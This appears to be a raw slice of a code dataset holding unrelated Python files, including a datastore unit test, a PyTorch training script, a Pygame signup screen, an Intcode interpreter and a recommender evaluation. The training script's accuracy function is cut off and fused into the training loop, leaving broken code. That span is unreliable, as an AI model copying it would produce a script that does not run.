All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest2\n\n_DATASET_ID = 'DATASET'\n_KIND = 'KIND'\n_ID = 1234\n\n\nclass TestEntity(unittest2.TestCase):\n\n def setUp(self):\n from gcloud.datastore import _implicit_environ\n self._replaced_dataset_id = _implicit_environ.DATASET_ID\n _implicit_environ.DATASET_ID = None\n\n def tearDown(self):\n from gcloud.datastore import _implicit_environ\n _implicit_environ.DATASET_ID = self._replaced_dataset_id\n\n def _getTargetClass(self):\n from gcloud.datastore.entity import Entity\n return Entity\n\n def _makeOne(self, key=None, exclude_from_indexes=()):\n klass = self._getTargetClass()\n return klass(key=key, exclude_from_indexes=exclude_from_indexes)\n\n def test_ctor_defaults(self):\n klass = self._getTargetClass()\n entity = klass()\n self.assertEqual(entity.key, None)\n self.assertEqual(entity.kind, None)\n self.assertEqual(sorted(entity.exclude_from_indexes), [])\n\n def test_ctor_explicit(self):\n _EXCLUDE_FROM_INDEXES = ['foo', 'bar']\n key = _Key()\n entity = self._makeOne(\n key=key, exclude_from_indexes=_EXCLUDE_FROM_INDEXES)\n self.assertEqual(sorted(entity.exclude_from_indexes),\n sorted(_EXCLUDE_FROM_INDEXES))\n\n def test___repr___no_key_empty(self):\n entity = self._makeOne()\n self.assertEqual(repr(entity), '')\n\n def test___repr___w_key_non_empty(self):\n key = _Key()\n key._path = '/bar/baz'\n entity = self._makeOne(key=key)\n entity['foo'] = 'Foo'\n self.assertEqual(repr(entity), \"\")\n\n\nclass _Key(object):\n _MARKER = object()\n _key = 'KEY'\n _partial = False\n _path = None\n _id = None\n _stored = None\n\n def __init__(self, dataset_id=_DATASET_ID):\n self.dataset_id = dataset_id\n\n @property\n def path(self):\n return self._path\n","sub_path":"gcloud/datastore/test_entity.py","file_name":"test_entity.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"242153324","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom random import randint\nimport numpy as np\nimport utils\nimport os\nimport time\nimport readin\nimport mynet\n\ndef get_accu(out_prob,real_label,bs):\n count=0\n for i in range(bs):\n temp=0.0\n maxp=0\n for j in range(12):\n if temp0)and(epoch%4==0) :\n# del optimizer\n# lr=lr/2\n# optimizer=torch.optim.SGD(net.parameters(),lr)\n \n for step in range(12):\n # read in the data\n train_data = readin.read_part_image(train_data_dir,step*1000,1000)\n train_label= readin.read_part_xml(train_label_dir,step*1000,1000)\n print(train_data.size(),train_data.type())\n train_label=train_label[:,0]\n train_data=train_data.to(device)\n train_label=train_label.to(device)\n \n step_loss=0.0\n for iter in range(iter_num):\n if iter>0 :\n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del log_prob\n del loss\n \n # create a minibatch\n indices=iter*bs\n minibatch_data = train_data[indices:indices+bs]\n 
minibatch_label= train_label[indices:indices+bs]\n minibatch_data=minibatch_data.to(device)\n minibatch_label=minibatch_label.to(device)\n \n # feed the input to the net\n inputs=minibatch_data\n inputs.requires_grad_()\n prob=net(inputs)\n \n # update the weights\n log_prob=torch.log(prob)\n loss=criterion(log_prob, minibatch_label)\n #loss=criterion(prob, minibatch_label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n step_loss=step_loss+loss.item()\n record.write(\"\\nbatch no.\"+str(step*iter_num+iter)+\" loss: \"+'{0:.4f}'.format(loss.item())+\" time: \"+'{0:.2f}'.format(time.time()-start_time))\n \n del train_data\n del train_label\n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del log_prob\n del loss\n print(\"step loss: \",step_loss/iter_num)\n record.write(\"\\nstep loss: \"+'{0:.4f}'.format(step_loss/iter_num))\n \n small_data = readin.read_part_image(small_data_dir,0,1740)\n small_label= readin.read_part_xml(small_label_dir,0,1740)\n small_label=small_label[:,0]\n small_data=small_data.to(device)\n small_label=small_label.to(device)\n small_loss=0.0\n accu_count=0\n for iter in range(int(1740/bs)):\n if iter>0 :\n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del log_prob\n del loss\n \n # create a minibatch\n indices=iter*bs\n minibatch_data = small_data[indices: indices+bs]\n minibatch_label= small_label[indices: indices+bs]\n minibatch_data=minibatch_data.to(device)\n minibatch_label=minibatch_label.to(device)\n #print(minibatch_label.type())\n \n # feed the input to the net\n inputs=minibatch_data\n prob=net(inputs)\n \n # get the accuracy\n accu_count=accu_count+get_accu(prob,minibatch_label,bs)\n \n # get the loss\n log_prob=torch.log(prob)\n loss=criterion(log_prob, minibatch_label)\n #loss=criterion(prob, minibatch_label)\n small_loss=small_loss+loss.item()\n \n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del loss \n del small_data\n del small_label\n print(\"small loss:\",small_loss/87,\"accuracy:\",accu_count/1740)\n record.write(\"small loss:\"+'{0:.4f}'.format(small_loss/87)+\" accuracy:\"+'{0:.4f}'.format(accu_count/1740))\n \n net_name=origname+\"_epoch_\"+str(epoch)+\".pt\"\n torch.save(net.state_dict(),net_name)\nrecord.close()\n\n\n","sub_path":"server/train_simplynet_V2_lr005.py","file_name":"train_simplynet_V2_lr005.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"106067286","text":"\"\"\"1021. 个位数统计 (15)给定一个k位整数N = dk-1*10k-1 + ... 
+\nd1*101 + d0 (0<=di<=9, i=0,...,k-1,\ndk-1>0), write a program that counts the number of occurrences of each distinct digit. For example, given N = 100311,\nthere are two 0s, three 1s, and one 3.\nInput:\neach input contains one test case, a positive integer N with no more than 1000 digits.\nOutput:\nfor each distinct digit D in N, output D and its count M on one line in the format D:M, in increasing order of D.\"\"\"\n\ninput = list(input())\n\ncount_dict = {i: 0 for i in range(10)}\nfor item in input:\n count_dict[int(item)] += 1\n\nfor num, count in count_dict.items():\n if count != 0:\n print("%d:%d" % (int(num), count))\n\nexit(0)\n\n# note: the dict type is the key point being tested here.\n","sub_path":"pat-b-practise/1021.py","file_name":"1021.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"391185590","text":"from telas.JanelaPadrao import JanelaPadrao\r\nfrom PPlay.gameimage import GameImage\r\nfrom PPlay.sprite import *\r\nfrom componentes.botao import *\r\nfrom PPlay.mouse import Mouse\r\nfrom componentes.campoTexto import CampoTexto\r\nfrom componentes.campoSenha import CampoSenha\r\nimport pygame\r\nfrom servico.Login import cadastro\r\nfrom constant import *\r\n\r\n\"\"\"provisional button; needs to be redone using a component\"\"\"\r\nclass Cadastro(JanelaPadrao):\r\n def __init__(self, janela):\r\n super().__init__(janela)\r\n self.bg = GameImage(image_file=\"./assets/imagem/tela_inicial/fundo.png\")\r\n self.bg.set_scale(self.janela.width , self.janela.height)\r\n\r\n self.loginCampo = CampoTexto(janela,\r\n GameImage(\"assets/imagem/cadastro/informe_email.png\"),\r\n janela.width/2 - 320, 180, 640, 60)\r\n\r\n self.usernameCampo = CampoTexto(janela,\r\n GameImage(\"assets/imagem/cadastro/informe_nome_usuario.png\"),\r\n janela.width/2 - 320, 300, 640, 60)\r\n\r\n self.senhaCampo = CampoSenha(janela,\r\n GameImage(\"assets/imagem/cadastro/defina_senha.png\"),\r\n janela.width/2 - 320, 420, 640, 60)\r\n\r\n self.confirmaSenhaCampo = CampoSenha(janela,\r\n GameImage(\"assets/imagem/cadastro/confirme_senha.png\"),\r\n janela.width/2 - 320, 540, 640, 60)\r\n\r\n botao_sprite = Sprite(\"assets/imagem/cadastro/botao_cadastrar.png\")\r\n botao_selecionado_sprite = Sprite(\"assets/imagem/cadastro/botao_cadastrar_select.png\")\r\n self.botao = Botao(botao_sprite, botao_selecionado_sprite, estados[\"cadastro\"])\r\n altura_botao = self.confirmaSenhaCampo.y + self.confirmaSenhaCampo.height + 25\r\n self.botao.setposition(self.janela.width/2 - self.botao.width/2, altura_botao)\r\n #self.botao = pygame.Rect([480,490,320,60])\r\n\r\n self.barra_superior = GameImage(\"assets/imagem/barra_superior_geral.png\")\r\n\r\n self.titulo_janela = GameImage(\"assets/imagem/cadastro/letrero_cadastro.png\")\r\n self.titulo_janela.set_position(50, self.barra_superior.height/2 - self.titulo_janela.height/2)\r\n\r\n sprite_x = Sprite(\"assets/imagem/historico/icon_x.png\")\r\n self.botao_x = Botao(sprite_x, sprite_x, 20)\r\n self.botao_x.setposition(self.janela.width- self.botao_x.width-15, 15)\r\n \r\n\r\n def loop(self):\r\n\r\n self.janela.input_pygame = True\r\n\r\n clicou_cadastro = False\r\n mouse = Mouse()\r\n\r\n while True:\r\n\r\n self.draw()\r\n\r\n saiu = self.botao_x.update()\r\n if saiu:\r\n self.janela.input_pygame = False\r\n return estados[\"menu_inicial\"], None\r\n\r\n cadastrar = self.botao.update()\r\n if cadastrar:\r\n clicou_cadastro = True\r\n\r\n if clicou_cadastro and not mouse.is_button_pressed(1):\r\n if self.confirmaSenhaCampo.texto == self.senhaCampo.texto:\r\n clicou_cadastro = False\r\n sucesso, resultado = cadastro(self.loginCampo.texto, self.usernameCampo.texto, self.senhaCampo.texto)\r\n if not 
sucesso:\r\n print(resultado)\r\n else:\r\n self.janela.input_pygame = False\r\n return estados[\"menu_logado\"], resultado\r\n \r\n self.janela.update()\r\n\r\n def draw(self):\r\n super().draw()\r\n self.bg.draw()\r\n self.barra_superior.draw()\r\n self.titulo_janela.draw()\r\n self.botao_x.render()\r\n self.loginCampo.draw()\r\n self.usernameCampo.draw()\r\n self.confirmaSenhaCampo.draw()\r\n self.senhaCampo.draw()\r\n self.botao.render()\r\n #pygame.draw.rect(self.janela.get_screen(), (200,15,51),self.botao)\r\n\r\n def evento(self, e):\r\n super().evento(e)\r\n self.usernameCampo.evento(e)\r\n self.loginCampo.evento(e)\r\n self.senhaCampo.evento(e)\r\n self.confirmaSenhaCampo.evento(e)\r\n","sub_path":"WAR/telas/Cadastro.py","file_name":"Cadastro.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"50279558","text":"from unittest import TestCase, skip\nfrom unittest.mock import patch, Mock, call\nimport pickle\n\nfrom .table_mock import TableMock\n\n\ndef create_g_mock():\n return TableMock({\n 'net': TableMock({\n 'Start': Mock(name='net.Start'),\n 'WriteUInt': Mock(name='net.WriteUInt'),\n 'WriteData': Mock(name='net.WriteData'),\n 'Send': Mock(name='net.Send'),\n 'SendToServer': Mock(name='net.SendToServer'),\n 'WriteType': Mock(name='net.WriteType'),\n }),\n 'Player': Mock(name='Player'),\n 'CLIENT': True\n })\n\n\n@patch('gmod.lua.G', new_callable=create_g_mock)\nclass SendTestCase(TestCase):\n def test_wrong_message_type_name(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send\n\n with self.assertRaises(TypeError):\n send(123, 1)\n\n def test_no_receiver(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send\n\n with self.assertRaises(ValueError):\n send('spam', 1, 2)\n\n def test_from_client(self, g):\n from gmod import realms\n\n realms.CLIENT = True\n realms.SERVER = False\n\n from gmod.net import send\n\n data = (1, 2, 3)\n pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)\n\n send('spam', *data)\n\n g.net.Start.assert_called_once_with('spam')\n g.net.WriteUInt.assert_called_once_with(len(pickled), 32)\n g.net.WriteData.assert_called_once_with(pickled, len(pickled))\n g.net.SendToServer.assert_called_once()\n\n def test_from_server(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send\n from gmod import player\n\n data = (2, 3, 4)\n pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)\n ply = player.get_by_userid(1)\n\n send('eggs', *data, receiver=ply)\n\n g.net.Start.assert_called_once_with('eggs')\n g.net.WriteUInt.assert_called_once_with(len(pickled), 32)\n g.net.WriteData.assert_called_once_with(pickled, len(pickled))\n g.net.Send.assert_called_once_with(ply)\n\n def test_no_data(self, g):\n from gmod import realms\n\n realms.CLIENT = True\n realms.SERVER = False\n\n from gmod.net import send\n\n pickled = pickle.dumps((), pickle.HIGHEST_PROTOCOL)\n\n send('foo')\n\n g.net.Start.assert_called_once_with('foo')\n g.net.WriteUInt.assert_called_once_with(len(pickled), 32)\n g.net.WriteData.assert_called_once_with(pickled, len(pickled))\n g.net.SendToServer.assert_called_once()\n\n @skip('Support of cross-language net messages is postponed')\n def test_to_lua(self, g):\n from gmod import realms\n\n realms.CLIENT = True\n realms.SERVER = False\n\n from gmod.net import send\n\n send('foo', 5, 6, 
handled_in_lua=True)\n\n g.net.Start.assert_called_once_with('foo')\n g.net.WriteType.assert_has_calls([call(5), call(6)])\n g.net.SendToServer.assert_called_once()\n\n\n@patch('gmod.lua.G', new_callable=create_g_mock)\nclass DefaultReceiverTestCase(TestCase):\n def test_normal(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send, default_receiver\n from gmod import player\n\n ply = player.get_by_userid(1)\n pickled1 = pickle.dumps((1,), pickle.HIGHEST_PROTOCOL)\n pickled2 = pickle.dumps((2,), pickle.HIGHEST_PROTOCOL)\n\n with default_receiver(ply):\n send('spam', 1)\n send('eggs', 2)\n\n g.net.Start.assert_has_calls([call('spam'), call('eggs')])\n g.net.WriteUInt.assert_has_calls([call(len(pickled1), 32), call(len(pickled2), 32)])\n g.net.WriteData.assert_has_calls([call(pickled1, len(pickled1)), call(pickled2, len(pickled2))])\n g.net.Send.assert_has_calls([call(ply), call(ply)])\n\n def test_wrong_type(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send, default_receiver\n\n with self.assertRaises(ValueError):\n with default_receiver(1):\n send('spam', 1)\n","sub_path":"tests/tests/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96836223","text":"import os\nimport cv2\nimport torch\nimport numpy as np\n\nfrom PIL import Image\nfrom torchvision import datasets, transforms\nfrom torch.utils.serialization import load_lua\n\nfrom datasets.utils import create_loader, normalize_train_test_images\n\ndef load_cluttered_mnist(path, segment='train'):\n full = load_lua(os.path.join(path, '%s.t7'%segment))\n data = [t[0].unsqueeze(1) for t in full]\n labels = []\n for t in full:\n _, index = torch.max(t[1], 0)\n labels.append(index.unsqueeze(0))\n\n return [torch.cat(data).type(torch.FloatTensor).numpy(),\n torch.cat(labels).squeeze().type(torch.LongTensor).numpy()]\n\n\nclass ClutteredMNISTDataset(torch.utils.data.Dataset):\n def __init__(self, path, segment='train', transform=None, target_transform=None):\n\n self.path = os.path.expanduser(path)\n self.transform = transform\n self.target_transform = target_transform\n self.segment = segment.lower().strip() # train or test or val\n\n # load the images and labels\n self.imgs, self.labels = self._load_from_path()\n\n def _load_from_path(self):\n # load the tensor dataset from it's t7 binaries\n imgs, labels = load_cluttered_mnist(self.path, segment=self.segment)\n print(\"imgs_%s = \"%self.segment, imgs.shape,\n \" | lbl_%s = \"%self.segment, labels.shape)\n return imgs, labels\n\n def __getitem__(self, index):\n img, target = self.imgs[index], self.labels[index]\n img = Image.fromarray(np.uint8(img.squeeze()*255))\n #img = np.transpose(img, (1, 2, 0))\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n #img = np.transpose(img, (1, 2, 0))\n #img = Image.fromarray(np.uint8(img*255))\n return img, target\n\n def __len__(self):\n return len(self.imgs)\n\n\nclass ClutteredMNISTLoader(object):\n def __init__(self, path, batch_size, train_sampler=None, test_sampler=None,\n transform=None, target_transform=None, use_cuda=1, **kwargs):\n # first get the datasets\n train_dataset, test_dataset = self.get_datasets(path, transform,\n target_transform)\n\n # normalize the images\n # train_dataset.imgs, test_dataset.imgs 
= normalize_train_test_images(\n # train_dataset.imgs, test_dataset.imgs\n # )\n\n # build the loaders\n kwargs = {'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n self.train_loader = create_loader(train_dataset,\n train_sampler,\n batch_size,\n shuffle=True if train_sampler is None else False,\n **kwargs)\n\n self.test_loader = create_loader(test_dataset,\n test_sampler,\n batch_size,\n shuffle=False,\n **kwargs)\n\n self.output_size = 10\n self.batch_size = batch_size\n self.img_shp = [1, 100, 100]\n\n @staticmethod\n def get_datasets(path, transform=None, target_transform=None):\n if transform:\n assert isinstance(transform, list)\n\n transform_list = []\n if transform:\n transform_list.extend(transform)\n\n transform_list.append(transforms.ToTensor())\n train_dataset = ClutteredMNISTDataset(path, segment='train',\n transform=transforms.Compose(transform_list),\n target_transform=target_transform)\n test_dataset = ClutteredMNISTDataset(path, segment='test',\n transform=transforms.Compose(transform_list),\n target_transform=target_transform)\n return train_dataset, test_dataset\n","sub_path":"mnist_cluttered.py","file_name":"mnist_cluttered.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"337698261","text":"#!/usr/local/bin/python3\n\nimport sys\nfrom io import StringIO\nfrom itertools import permutations\n\nprojectInput = \"3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5\"\nbasePhaseSettings = ['9','8','7','6','5']\n\n# Turn on logging (printed to STDERR)\nlogLevel = 2\n\n\nvalidInstructions = [1,2,3,4,5,6,7,8,99]\n\n\ndef printToLog(level, out):\n\tif level <= logLevel :\n\t\tprint(out, file = sys.stderr)\n\treturn\n\n\nclass IntcodeComputer:\n\t\n\tdef __init__ (self, program):\n\t\t\"\"\" Establish execution program \"\"\"\n\t\n\t\tself.programCode = program.split(\",\")\n\t\tself.currentIndex = 0\n\t\tself.steps = 0\n\t\tself.inputValues = []\n\t\tself.outputValues = []\n\t\tself.manualInput = True\n\t\tself.manualOutput = True\n\t\t\n\tdef updateLocation(self, location, value):\n\t\tself.programCode[location] = str(value)\n\t\treturn\n\t\t\n\tdef readFromFile(self, inputFileName):\n\t\tself.manualInput = False\n\t\tself.inFile = open(inputFileName, 'r')\n\n\n\tdef getParameters(self, number, mask):\n\t\t\"\"\" Get the parameters based on 'number' \"\"\"\n\t\tstrParameters = self.programCode[self.currentIndex+1 : self.currentIndex + number + 1]\n\t\tparameters = list(map(lambda x : int(x), strParameters))\n\t\tparms = self.evaluateParms(parameters, mask)\n\t\tprintToLog(1, \"\\t\\tReturn Parameters: {0}\".format(parms))\n\t\treturn parms\n\t\t\n\tdef evaluateParms(self, parms, mask):\n\t\t\"\"\" Evaluate Parms base on Mask and return real Parameter Values \"\"\"\n\t\t\n\t\tprintToLog(1, \"\\t\\tPassed Parameters: {0}\".format(parms))\n\t\treturnParms=[]\n\t\tfor i in range(len(parms)-1):\n\t\t\tmaskCode = mask[0]\n\t\t\tparmValue = parms[i]\n\t\t\tif maskCode == '0':\n\t\t\t\tprintToLog(2, \"\\t\\tGetting Position Value {0} from Position {1}\".format(self.programCode[parmValue], parmValue))\n\t\t\t\treturnParms.append(int(self.programCode[parmValue]))\n\t\t\telif maskCode == '1':\n\t\t\t\tprintToLog(2, \"\\t\\tGetting Immediate Value {0} \".format(parmValue))\n\t\t\t\treturnParms.append(parmValue)\n\t\t\telse:\n\t\t\t\tprintToLog(0, \"*** ILLEGAL MASK {0} ***\".format(mask))\n\t\t\t\texit()\n\t\t\tmask = mask[1:]\n\t\t\t\t\t\n# 
\t\tAppend Location store\n\t\tmaskCode = mask[0]\n\t\treturnParms.append(int(parms[-1]))\n \t\t\t\n\t\treturn returnParms\n\t\t\t\t\n\t\t\n\tdef getInstruction(self):\n\t\t\"\"\" Get the next instruction code\"\"\"\n\t\tnextInstruction = self.programCode[self.currentIndex].zfill(5)\n\t\tprintToLog(1,\"Received Instruction Code {1} from Position {0}\".format(self.currentIndex, nextInstruction))\n\t\tmask = nextInstruction[0:3][::-1]\n\t\tinstruction = int(nextInstruction[3:5])\n\t\treturn instruction, mask\n\t\t\n\tdef returnCode(self, location):\n\t\treturn int(self.programCode[location])\n\t\t\n\tdef execCode(self):\n\t\t\"\"\" Execute Code \"\"\"\n\t\n\t\twhile True:\n\t\t\n\t\t\tself.steps += 1\n\t\t\tprintToLog(1,\"--------------------------------------------------\")\n\t\t\tprintToLog(3, self.programCode)\n\t\t\tinstruction, mask = self.getInstruction()\t\t\n\t\t\tprintToLog(2, \"\\tExecuting Code: {0} with Mask: {1}\".format(instruction, mask))\n\t\n\t\t\tif instruction not in validInstructions:\n\t\t\t\tprint(0, \"** Illegal Instruction Code: {0} at Position: {1} and Step: {2}\".format(instruction, self.currentIndex, self.steps))\n\t\t\t\texit()\n\t\t\n\t\t\tif instruction == 1:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tx, y, outputLocation = parms\n\t\t\t\ta = x + y\n\t\t\t\tself.updateLocation(outputLocation, a)\n\t\t\t\tprintToLog(2, \"\\tExecute {0} + {1} with result: {2} and stored in Position: {3}\".format(x,y, a, outputLocation))\n\t\t\t\tself.currentIndex += 4\n\n\t\t\t\n\t\t\telif instruction == 2:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tx, y, outputLocation = parms\n\t\t\t\ta = x * y\n\t\t\t\tself.updateLocation(outputLocation, a)\n\t\t\t\tprintToLog(2, \"\\tExecute {0} * {1} with result: {2} and stored in Position: {3}\".format(x,y, a, outputLocation))\n\t\t\t\tself.currentIndex += 4\n\t\t\t\t\n\t\t\telif instruction == 3:\n\t\t\t\tparms = self.getParameters(1, mask)\n\t\t\t\toutputLocation = parms[-1]\n\t\t\t\tx = input()\n\t\t\t\tself.updateLocation(outputLocation,x)\n\t\t\t\tprintToLog(2, \"\\tReceived Input {0} and stored in Position: {1}\".format(x,outputLocation))\n\t\t\t\tself.currentIndex += 2\n\t\t\t\n\t\t\telif instruction == 4:\n\t\t\t\tparms = self.getParameters(1, mask)\n\t\t\t\tif mask[0] == '0':\n\t\t\t\t\tinputLocation = parms[0]\n\t\t\t\t\tx = self.returnCode(inputLocation)\n\t\t\t\telse:\n\t\t\t\t\tx = int(parms[0])\n\t\t\t\t\tinputLocation = \"N/A\"\n\t\t\t\tprint(x)\n\t\t\t\tprintToLog(2, \"\\tPrinted value: {0} from Position: {1}\".format(x, inputLocation))\n\t\t\t\tself.currentIndex += 2\n\n\t\t\telif instruction == 5:\n\t\t\t\tparms = self.getParameters(2, mask)\n\t\t\t\tvalueToCheck = parms[0]\n\t\t\t\tif mask[1] == '0':\n\t\t\t\t\tnewLocation = self.programCode[parms[1]]\n\t\t\t\telse:\n\t\t\t\t\tnewLocation = parms[1]\n\t\t\t\tif valueToCheck:\n\t\t\t\t\tself.currentIndex = int(newLocation)\n\t\t\t\telse: \n\t\t\t\t\tnewLocation = self.currentIndex + 3\n\t\t\t\tprintToLog(2, \"\\tValue {0} is {1}, jumping to Position: {2}\".format(valueToCheck, (valueToCheck != 0), newLocation))\n\t\t\t\tself.currentIndex = int(newLocation)\n\t\t\t\t\n\t\t\telif instruction == 6:\n\t\t\t\tparms = self.getParameters(2, mask)\n\t\t\t\tvalueToCheck = parms[0]\n\t\t\t\tif mask[1] == '0':\n\t\t\t\t\tnewLocation = self.programCode[parms[1]]\n\t\t\t\telse:\n\t\t\t\t\tnewLocation = parms[1]\n\t\t\t\tif not valueToCheck:\n\t\t\t\t\tself.currentIndex = newLocation\n\t\t\t\telse: \n\t\t\t\t\tnewLocation = self.currentIndex + 
3\n\t\t\t\tprintToLog(2, \"\\tValue {0} is {1}, jumping to Position: {2}\".format(valueToCheck, not (valueToCheck != 0), newLocation))\n\t\t\t\tself.currentIndex = int(newLocation)\n\n\t\t\telif instruction == 7:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tvalueToCheck1, valueToCheck2, outputLocation = parms\n\t\t\t\tresult = (valueToCheck1 < valueToCheck2)\n\t\t\t\tself.updateLocation(outputLocation, int(result))\n\t\t\t\tprintToLog(2, \"\\tValue {0} > {1} is {2}, storing {3} in Position: {2}\".format(valueToCheck1, valueToCheck2, result, int(result)))\n\t\t\t\tself.currentIndex += 4\n\t\t\t\n\t\t\telif instruction == 8:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tvalueToCheck1, valueToCheck2, outputLocation = parms\n\t\t\t\tresult = (valueToCheck1 == valueToCheck2)\n\t\t\t\tself.updateLocation(outputLocation, int(result))\n\t\t\t\tprintToLog(2, \"\\tValue {0} > {1} is {2}, storing {3} in Position: {2}\".format(valueToCheck1, valueToCheck2, result, int(result)))\n\t\t\t\tself.currentIndex += 4\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\telse:\n\t\t\t\tprintToLog(1, \"BREAK-BREAK-BREAK\")\n\t\t\t\t# Executing Code 99\n\t\t\t\tbreak\n\t\t\t\n\t\treturn\n\t\t\ndef checkInputs(phaseSettingsSeed):\n\n\tampInputSignal = '0'\n\t\n\tfor phaseSetting in phaseSettingsSeed:\n\t\t# reset the stdin/STDOUT\n\t\tmyStdIn = StringIO()\n\t\tmyStdOut = StringIO()\n\t\t\n\t\t# Seed the input feed\n\t\tsys.stdout = myStdIn\n\t\tprint(str(phaseSetting))\n\t\tprint(str(ampInputSignal)) \n\t\tprintToLog(1, \"\\n===================================================\")\n\t\tprintToLog(1, \"Excecuting Program with Phase {0} and Amp {1}\".format(phaseSetting, ampInputSignal))\n\t\t\t\n\t\t# Reset Input File and redirect Stdin\n\t\tsys.stdin = myStdIn\t\n\t\tmyStdIn.seek(0)\n\t\tsys.stdout = myStdOut\n\t\t\n\t\t# Execute the program\n\t\tcomputer=IntcodeComputer(projectInput)\n\t\tcomputer.execCode()\n\t\t\n\t\t# Now get the output \t\t\n\t\tmyStdOut.seek(0)\n\t\tampInputSignal = str(myStdOut.getvalue().split()[0]).zfill(5)\n\t\tprintToLog(1, \"Amp Out Signal: {0}\".format(ampInputSignal))\n\t\tmyStdIn.flush()\n\t\tmyStdOut.flush()\n\t\t\n\treturn ampInputSignal\n\ndef main():\n\t\n\toldStdOut = sys.stdout \n\toldStdIn = sys.stdin\n\t\n\tphaseSettingsArray = list(permutations(basePhaseSettings, len(basePhaseSettings)))\n\tbestOutput = 0\n\tbestCombo = []\n\n\t# Test only single permutation\n\tbestOutput = int(checkInputs(basePhaseSettings))\n\n# \tfor phaseSetting in phaseSettingsArray:\n# \t\tampOutput = int(checkInputs(phaseSetting))\n# \t\tif ampOutput > bestOutput:\n# \t\t\tbestOutput = ampOutput\n# \t\t\tbestCombo = phaseSetting\n\n\n\t\n\tsys.stdout = oldStdOut\n\tsys.stdin = oldStdIn\n\n\tprint(bestOutput)\t\n\tprintToLog(1, bestCombo)\n\t\n\t\t\t\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"2019/Day7-2.py","file_name":"Day7-2.py","file_ext":"py","file_size_in_byte":7589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303432859","text":"#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\nname = '屈星哲'\nnameLenght = len(name)\nprint(\"name = \" , name , \"长度:\" , nameLenght)\n\n\ntipsContent = '你好,\\t%s\\t,这个月你还没给我们发\\t%s\\t,每人\\t%d\\t个'%('jobs',\"月饼\",5)\nprint(tipsContent)\n\ndate = '%2d-%05d' % (3,1)\nprint(date)\n\n\n\ns1 = 72\ns2 = 74\nr = (74 - 72) / 72 * 100\nprint('%.1f %%' % r)\n\ns = 
u'Python-中文'\nprint(s)","sub_path":"Python/Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140392500","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 11 14:55:39 2019\n\n@author: Stella Galamo\n\"\"\"\n\nfrom Main import Main\nfrom surprise import SVD, SVDpp\nfrom surprise import NormalPredictor\nfrom Evaluator import Evaluator\n\nimport random\nimport numpy as np\n\ndef LoadSpecialistData():\n main = Main()\n print(\"Loading ratings...\")\n data = main.loadData()\n print(\"\\nComputing specialists popularity ranks so we can measure novelty later...\")\n rankings = main.getPopularityRanks\n return (main, data, rankings)\n\nnp.random.seed(0)\nrandom.seed(0)\n\n# Load up common data set for the recommender algorithms\n(main, evaluationData, rankings) = LoadSpecialistData()\n\n# Construct an Evaluator to, you know, evaluate them\nevaluator = Evaluator(evaluationData, rankings)\n\n# SVD\nSVD = SVD()\nevaluator.AddAlgorithm(SVD, \"SVD\")\n\n# SVD++\nSVDPlusPlus = SVDpp()\nevaluator.AddAlgorithm(SVDPlusPlus, \"SVD++\")\n\n# Just make random recommendations\nRandom = NormalPredictor()\nevaluator.AddAlgorithm(Random, \"Random\")\n\n# Fight!\nevaluator.Evaluate(False)\n\nevaluator.SampleTopNRecs(main)","sub_path":"RecommenderSystem/MatrixFactorization/SVDBakeOff.py","file_name":"SVDBakeOff.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 